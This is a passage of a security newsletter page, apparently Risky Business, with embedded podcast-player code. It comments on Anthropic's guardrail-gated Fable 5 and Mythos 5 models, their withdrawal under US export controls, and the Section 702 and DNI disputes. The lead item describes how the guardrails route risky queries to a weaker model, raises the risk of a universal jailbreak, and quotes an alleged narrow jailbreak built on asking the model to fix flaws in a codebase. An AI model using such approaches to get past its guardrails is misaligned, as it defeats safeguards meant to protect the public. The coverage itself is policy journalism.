&quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: Anthropic has artificial, but not emotional, intelligence&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="srsly-risky-biz-anthropic-lacks-emotional-intelligence">Srsly Risky Biz: Anthropic Lacks Emotional Intelligence</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-d672268e-2d80-4227-ab0e-15abf4f2e0df.jpeg" class="kg-image" alt="Srsly Risky Biz: Anthropic Lacks Emotional Intelligence" loading="lazy" width="2000" height="1125" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/06/data-src-image-d672268e-2d80-4227-ab0e-15abf4f2e0df.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/06/data-src-image-d672268e-2d80-4227-ab0e-15abf4f2e0df.jpeg 1000w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1600/2026/06/data-src-image-d672268e-2d80-4227-ab0e-15abf4f2e0df.jpeg 1600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-d672268e-2d80-4227-ab0e-15abf4f2e0df.jpeg 2048w" sizes="(min-width: 720px) 720px"><figcaption><span style="white-space: pre-wrap;">Photo by</span><a href="https://unsplash.com/@csoref?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Colton Duke</span></u></a><span style="white-space: pre-wrap;"> on</span><a href="https://unsplash.com/photos/man-standing-on-hill-digital-wallpaper-QRU0i5AqEJA?utm_source=unsplash&amp;utm_medium=referral&amp;utm_content=creditCopyText"> <u><span class="underline" style="white-space: pre-wrap;">Unsplash</span></u></a></figcaption></figure><p>The stoush between Anthropic and the US government has erupted once again, this time over concerns about how the release of new AI models is being managed.</p><p>Early last week, Anthropic rolled out two new models, Mythos 5 and Fable 5. By Friday, they&apos;d been pulled.</p><p><em>The Wall Street Journal</em> reported their withdrawal <a href="https://www.wsj.com/tech/ai/amazon-ceos-talks-with-u-s-officials-triggered-crackdown-on-anthropic-models-dcc90578"><u>was kicked off by conversations</u></a> on Thursday last week between Amazon CEO Andy Jassy and US officials, including Treasury Secretary Scott Bessent. Jassy raised the possibility that the models could be jailbroken and by Friday evening the Commerce Department told Anthropic that its models would be subject to export controls. These controls prohibit the models from being used by any foreign national, regardless of whether they are inside or outside of the US.&#xA0;</p><p>To ensure compliance, Anthropic cut off access to the two models for all of its customers.</p><p>The role of jailbreaks in all of this is important to understand.&#xA0;</p><p>Mythos 5 and Fable 5 are actually the same underlying model. In essence, Anthropic slapped some stricter guardrails on Mythos 5, changed its name to Fable and made it available for general use.&#xA0;</p><p>If a user submitted a prompt to Fable related to cyber security, chemistry, biology, or model distillation, the guardrails would kick queries down to Opus 4.8, a less-capable model. Mythos 5 has drastically fewer safeguards, but is only available to Project Glasswing participants; a <a href="https://www.anthropic.com/glasswing"><u>select group of cyber defenders</u></a>.&#xA0;</p><p>At first glance, this release strategy makes sense as a way to manage the risks of deploying advanced models. However, as <em>Risky Business Technology Editor</em> James Wilson <a href="https://risky.biz/RBFEATURES27/"><u>points out in this (terrific) solo podcast</u></a>, the strategy relies on these guardrails <em>actually being effective</em>. If Fable&apos;s guardrails were susceptible to a universal jailbreak, then all Mythos 5 capabilities would be available to anyone with access to Fable 5.</p><p>So, to reassure everyone, when Anthropic <a href="https://www.anthropic.com/news/claude-fable-5-mythos-5"><u>announced Fable 5</u></a>, it described the model&apos;s guardrails as &quot;cautious&#x2026; and stricter than ideal&quot;. It also said the UK AI Safety Institute&apos;s testing had not found a universal jailbreak in over 1,000 hours of testing. Although it did concede &quot;it is likely impossible to <em>completely</em> prevent universal jailbreaks&quot;.&#xA0;</p><p>As an additional control, Anthropic instituted a 30-day retention policy for all data sent to Mythos and Fable, saying the data would help them defend against novel and complex attacks, including jailbreaks. So far, so good.</p><p>Where things went wrong is when Jassy raised concerns to the government, which in turn raised those concerns with Anthropic, the company blew them off. An official also <a href="https://www.axios.com/2026/06/12/anthropic-trump-mythos-fable-national-security"><u>told <em>Axios</em></u></a> last week that the administration had tried to get Anthropic to delay releasing its new models, but Anthropic declined. But in its <a href="https://www.anthropic.com/news/fable-mythos-access"><u>statement about suspending access</u></a> to Fable and Mythos, Anthropic said:&#xA0;</p><blockquote>To date, the government has only given us verbal evidence of a potential narrow, non-universal jailbreak, which essentially consists of asking the model to read a specific codebase and fix any software flaws. Our understanding is that one potential jailbreak was shared with the government. We have reviewed a report that we believe is the basis of the government&apos;s directive and validated that the level of capability displayed there is widely available from other models (including OpenAI&#x2019;s GPT-5.5), and is used every day by the defenders who keep systems safe. We will share more details over the next 24 hours.&#xA0;</blockquote><p>This doesn&apos;t seem like a sensible comms approach to us, especially when Anthropic&apos;s name is already mud in the White House.&#xA0;</p><p>Anthropic can&apos;t seem to help itself from ignoring the Trump administration&apos;s preferences and making itself an enemy of the White House for absolutely no reason. Repeatedly.&#xA0;</p><p>The company is already on a <a href="https://www.axios.com/2026/04/08/anthropic-loses-bid-to-block-pentagon-blacklisting"><u>Pentagon blacklist</u></a> for being <a href="https://www.reuters.com/technology/us-defense-department-told-anthropic-it-is-supply-chain-risk-ceo-says-2026-03-06/"><u>a supply chain risk</u></a>. Now it&apos;s been slapped with a Commerce department export ban because it is too dangerous for foreign use, too.&#xA0;</p><p>This latest dispute is obviously not good for the company. <a href="https://cyberscoop.com/congress-reacts-anthropic-ai-export-controls/"><u>Lawmakers</u></a> are also concerned about the White House&apos;s (non)process, as are <a href="https://www.theinformation.com/articles/anthropic-ban-stirs-concerns-openai-beyond-crackdown-foreign-ai-talent"><u>Antropic&apos;s competitors</u></a>, who worry that similar, quasi-arbitrary measures will be imposed on them. There are also concerns from cybersecurity experts that this ban will <a href="https://www.cybersecuritydive.com/news/anthropic-us-government-export-ban-mythos-fable/822909/"><u>hinder defensive efforts</u></a> by preventing defenders from using the latest and greatest models to improve software security.</p><p>In an ideal world, formal, process-driven assessments of new models and their safeguards would be used to weigh up whether the benefits of new releases outweigh risks before governments made big decisions like this. That seems like a better approach than relying on Amazon&apos;s CEO making phone calls as a system for managing serious national security risks.&#xA0;</p><p>However, meticulous collection of data followed by sober analysis of risks and benefits isn&apos;t really this administration&apos;s style. So don&apos;t expect much to change on the government side of this.</p><p>On the Anthropic side, however, something <em>can </em>be done. Rather than <em>fighting </em>the administration, the company needs to learn how to manage upwards. Throwing data at administration officials, or <a href="https://cyberscoop.com/cybersecurity-experts-anthropic-fable-5-not-unique-ai-threat/"><u>expert testimony</u></a>, even if it <a href="https://freefable.org"><u>entirely supports Anthropic&apos;s argument</u></a>, won&apos;t make a difference. That&apos;s just not what is important to key Trump administration officials. Here&apos;s an idea: If they ask you to reassess your guardrails, just say yes!</p><p>Anthropic also needs to shut up about how dangerous its models are. Anthropic&apos;s core messaging seems to be that its models will unleash a jobs armageddon and cyber apocalypse. Governments do not like jobs armageddons, <em>nor</em> cyber apocalypses. Zero stars, Anthropic! Zero stars!</p><p>The great irony here is that the state of AI is changing fast, and it&apos;s somewhat likely that we&apos;ll have open weight models sitting on our desks with similar capabilities to Mythos 5 in a year or two. At that point, debates about export controls and guardrails will seem quaint.</p><p>But for now at least, Anthropic needs to focus a bit less on artificial intelligence and a little more on emotional intelligence.</p><h2 id="pulte-nomination-risks-americas-best-intel-source">Pulte Nomination Risks America&apos;s Best Intel Source</h2><p>Last week, the law that authorised what is known as Section 702 collection lapsed without reauthorisation for the first time since the statute was enacted in 2008.&#xA0;&#xA0;</p><p>The <a href="https://www.intel.gov/assets/documents/702-documents/702_Booklet-FINAL.pdf"><u>intelligence collection</u></a> authorised by this section of the Foreign Intelligence Surveillance Act (FISA) has been described as the &quot;<a href="https://www.lawfaremedia.org/article/usa-liberty-act-house-judiciarys-proposed-reauthorization-section-702"><u>crown jewel</u></a>&quot; of US surveillance programs.&#xA0;&#xA0;</p><p>Although the authorisation has lapsed, the FISA court has certified existing collection orders through to March 2027, so it seems intelligence gathering under 702 will continue until then. That&apos;s not a certainty, however, as <a href="https://www.npr.org/2026/06/12/nx-s1-5856291/fisa-702-surveillance-expiration-bill-pulte#:~:text=Still%2C%20some%20lawmakers%20worry%20that%20the%20companies%20compelled%20to%20turn%20over%20communications%20may%20attempt%20to%20challenge%20the%20law%20in%20court%2C%20possibly%20leading%20to%20an%20indeterminately%20long%20window%20during%20which%20they%20stop%20providing%20intel."><u>some lawmakers fear</u></a> that companies compelled by the law may challenge the intelligence collection in court.</p><p>Section 702 renewal has traditionally involved a bit of back and forth, and this year&apos;s attempt has already involved two extensions, one until April 30 and then a second one until Friday June 12.</p><p>Back in April <a href="https://news.risky.biz/srsly-risky-biz-musk-snubs-french-authorities/#theyve-got-702-problems-and-the-fbi-is-one"><u>we wrote</u></a> that some of the difficulty in reauthorising Section 702 this time round came down to &quot;a simple lack of trust in the administration&quot;.&#xA0;&#xA0;</p><p>That wasn&apos;t helped at all by President Donald Trump naming close ally Bill Pulte as acting Director of National Intelligence after Tulsi Gabbard <a href="https://apnews.com/article/trump-tulsi-gabbard-director-national-intelligence-iran-788f1f14259d72bd7936fa2e83149efa"><u>announced that she would be retiring</u></a> at the end of this month. Pulte has no national security experience but <em>does </em>have a <a href="https://www.theatlantic.com/national-security/2026/06/director-national-vengeance/687408/?gift=kPTlqn0J1iP9IBZcsdI5IWH__GAkwIvCJEFHtvc9tpg"><u>track record</u></a> of attacking Trump&apos;s perceived political enemies.&#xA0;</p><p>The possibility that Pulte could end up as DNI permanently was a showstopper. <a href="https://www.npr.org/2026/06/12/nx-s1-5856291/fisa-702-surveillance-expiration-bill-pulte"><u>Per <em>NPR</em></u></a>:</p><blockquote>In <a href="https://www.npr.org/2026/06/03/nx-s1-5844285/sen-mark-warner-on-bill-pulte-being-named-acting-national-intelligence-director"><u>an interview with NPR&apos;s Morning Edition</u></a>, Sen. Mark Warner, the top Democrat on the chamber&apos;s intel committee, said &quot;he&apos;s extraordinarily unqualified, but the timing could also not be more of a mistake.&quot; Hakeem Jeffries, the top House Democrat, described Pulte as a &quot;political hack&quot; and &quot;malignant clown.&quot;</blockquote><p>Republicans were also concerned. Senate Majority Leader John Thune told reporters, &quot;we don&apos;t need a weaponised DNI&quot; and that &quot;we need professionals there&quot;.</p><p>On Thursday last week, President Trump changed tack and nominated Jay Clayton, a former head of the Securities and Exchange Commission, to serve as Director of National Intelligence. Senator Warner described Clayton as &quot;a capable public servant&quot;.</p><p>The Senate <a href="https://apnews.com/article/jay-clayton-pulte-trump-national-intelligence-director-b9a89bd3f1cb9c70fcca79de4c42cc99"><u>intended to fast track</u></a> Clayton&apos;s confirmation process but in late-breaking news President Trump <a href="https://www.politico.com/news/2026/06/17/trump-delay-jay-clayton-dni-senate-hearing-00964723"><u>kyboshed that plan</u></a> by delaying Clayton&apos;s nomination hearings. This means that Pulte will necessarily act as DNI for at least several weeks.&#xA0;</p><p>So for now, it looks like the Section 702 intelligence collection will continue in an ok-but-far-from-ideal state. We&apos;re not holding our breath for Pulte to be dumped and Clayton confirmed, but assume that once that happens we&apos;ll go back to situation normal: a never-ending clown show of lawmaker arguments that end in temporary reauthorisations.&#xA0;</p><p><em>Watch James Wilson and Tom Uren discuss this edition of the newsletter:</em></p><h2 id="three-reasons-to-be-cheerful-this-week">Three Reasons to Be Cheerful This Week:</h2><ol><li><strong>Outsider Enterprise Phishing-as-a-service takedown:</strong> The FBI, Google, and Lumen have collaborated on taking down Outsider Enterprise, a Chinese phishing-as-a-service platform. <a href="https://www.linkedin.com/feed/update/urn:li:activity:7471232609633632256/"><u>The Bureau says</u></a> the service used over 8,000 phishing domains, and is estimated to have stolen more than 3.8 million credit cards causing USD$1.9 billion in losses. Google <a href="https://blog.google/innovation-and-ai/technology/safety-security/combatting-ai-scams/"><u>has further detail</u></a> about the takedown and the laws it is advocating for to combat scams.&#xA0;&#xA0;&#xA0;&#xA0;</li><li><strong>Closer cyber security ties with Ukraine: </strong>The<strong> </strong>European Union <a href="https://www.eeas.europa.eu/delegations/ukraine/eu-provides-cyber-support-ukraine-against-major-attacks_en"><u>has approved</u></a> the addition of Ukraine to its EU Cybersecurity Reserve. That means the country will now be able to access emergency support from the European Union Agency for Cybersecurity (ENISA) to respond to large-scale cyber security incidents.&#xA0;&#xA0;</li><li><strong>Russian emails quarantined by Estonia:</strong> The Estonian government announced that its public sector <a href="https://www.europesays.com/3064451/"><u>will quarantine all emails</u></a> from .ru domains for additional security checks. The Minister for Justice and Digital Affairs, Liisa Pakosta, said that &quot;.ru emails are increasingly being used in various cyberattacks&quot;.&#xA0;</li></ol><h2 id="sponsor-section">Sponsor Section</h2><p><em>In this <strong>Risky Business sponsor interview</strong>, Catalin Cimpanu talks with Brandon Dixon, co-founder and CTO of Ent AI, on the company&apos;s innovative use of local LLMs to track user behavior on the endpoint, and add context to suspicious events to detect or prevent malicious activity.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/RBNEWSSI132.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI132/&quot;&gt;Sponsored: Ent on using AI to track human behavior on the endpoint&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 19:36 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Ent on using AI to track human behavior on the endpoint&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> talk about how NATO is set up to deter conventional conflict, and how that approach is fundamentally unsuited for ongoing, everyday cyber operations that are intended to confound adversaries.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN170.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN170/&quot;&gt;Between Two Nerds: Why NATO and cyber don&apos;t mix&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 28:37 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = 